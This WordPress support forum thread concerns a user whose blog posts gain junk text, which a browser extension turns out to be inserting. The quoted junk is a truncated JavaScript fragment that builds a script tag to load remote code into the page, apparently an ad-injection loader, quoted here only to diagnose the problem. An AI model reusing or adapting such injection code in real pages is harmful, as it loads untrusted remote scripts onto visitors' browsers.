Junk text appearing in my post

  1. Every time I save a draft or preview a post, a paragraph of junk text gets added to the bottom. It even happened when I published without previewing or saving. The junk looks like this:

    // -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    Does anyone know why this is happening and how I can get rid of it? :-(

    The blog I need help with is

  2. Hm, I see it on this post

    How are you creating your posts? Are you writing directly in the Visual or HTML Editor or are you copying and pasting from a word processing program?

  3. No I'm just typing straight into the visual editor. For that first post I had tried to copy/paste some stuff from word, so when you suggested that I thought that might be the problem, but I've posted since then not copy/pasting anything, and I'm getting the same junk text.

  4. Please try disabling all browser add-ons and extensions.

  5. WordPress does not use text-enhanced ads. This has come up before and it was caused by browser extension that was installed in the person's browser. Whichbrowser and browser version are you using? Have you tried disabling all browser add-ns and extensions. Have you tried using a different browser to see if it happens with it as well? Do you have Zemanta 1? If so, remove it. See >

  6. Ah that did the trick! I was in Firefox but when I tried it in Safari I was able to get rid of the junk.

    Thank you so much!

  7. Hooray! I ♥ love ♥ happy endings. You're welocme.
